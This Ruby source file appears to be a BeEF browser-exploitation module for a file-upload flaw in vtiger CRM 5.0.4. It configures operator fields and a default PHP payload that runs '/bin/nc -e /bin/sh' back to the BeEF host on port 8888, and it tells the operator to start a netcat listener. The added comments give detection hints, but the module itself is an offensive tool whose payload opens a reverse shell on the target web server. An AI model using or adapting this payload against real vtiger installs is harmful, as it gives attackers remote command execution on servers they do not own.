git-svn-id: https://beef.googlecode.com/svn/trunk@908 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9
# BeEF command module for the vtiger CRM 5.0.4 upload issue named in its
# description. This class only declares metadata, the operator-editable input
# fields and their defaults; the browser-side logic lives in the module
# template enabled by use_template!, which is not part of this file.
#
# Defender notes, derived from the defaults below:
# - The default "Target Directory" is /storage/<year>/<Month name>/week<N>/,
#   so PHP files appearing under that tree of a vtiger install are worth
#   reviewing.
# - The default "Injected PHP" spawns /bin/nc with -e /bin/sh towards the BeEF
#   host on TCP port 8888, i.e. an outbound connection from the web server.
#   A web-server process starting nc or sh, or egress to that port, is the
#   corresponding signal. (The description string calls it a "reverse
#   bindshell"; the default payload connects back to the BeEF host.)
class Vtiger_crm_upload_exploit < BeEF::Core::Command

  # Registers the module with BeEF: name, description, category, authors,
  # the four input fields, the target declaration and the template.
  def initialize
    now = Time.new

    # Week-of-month bucket used in the default upload path:
    # days 1-7 => 1, 8-14 => 2, 15-21 => 3, 22-28 => 4, 29-31 => 5.
    week_of_month = (now.day - 1) / 7 + 1

    @configuration = BeEF::Core::Configuration.instance

    # Prefer the public host name and fall back to the bind host.
    # NOTE(review): if both lookups return nil, the string concatenation that
    # builds the default payload below raises TypeError; confirm that
    # beef.http.host is always set.
    beef_host = @configuration.get("beef.http.public")
    beef_host ||= @configuration.get("beef.http.host")

    default_upload_dir = "/storage/#{now.year}/#{now.strftime('%B')}/week#{week_of_month}/"
    default_payload = 'passthru("/bin/nc -e /bin/sh ' + beef_host + ' 8888");'

    # Input fields shown to the operator; every value is only a default.
    input_fields = [
      {
        'name' => 'vtiger_url',
        'ui_label' => 'Target Web Server',
        'value' => 'http://vulnerable-vtiger.site',
        'width' => '400px'
      },
      {
        'name' => 'vtiger_filepath',
        'ui_label' => 'Target Directory',
        'value' => default_upload_dir,
        'width' => '400px'
      },
      {
        'name' => 'vtiger_php',
        'ui_label' => 'Injected PHP',
        'value' => default_payload,
        'type' => 'textarea',
        'width' => '400px',
        'height' => '100px'
      },
      {
        'name' => 'upload_timeout',
        'ui_label' => 'Upload Timeout',
        'value' => '5000'
      }
    ]

    super({
      'Name' => 'VTiger CRM Upload Exploit',
      'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM <a href="http://www.vtiger.com/">vtiger 5.0.4</a><br />The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888',
      'Category' => 'Network',
      'Author' => ['wade', 'bm', 'pipes', 'xntrik'],
      'Data' => input_fields,
      'File' => __FILE__
    })

    # Declared as verified working in every browser.
    set_target({
      'verified_status' => VERIFIED_WORKING,
      'browser_name' => ALL
    })

    use 'beef.net.local'

    use_template!
  end

  # Stores the value found under 'result' in @datastore and does nothing when
  # that value is nil. Where @datastore gets filled is not visible in this
  # file; presumably the framework sets it from the hooked browser's response.
  def callback
    outcome = @datastore['result']
    save({'result' => outcome}) unless outcome.nil?
  end

end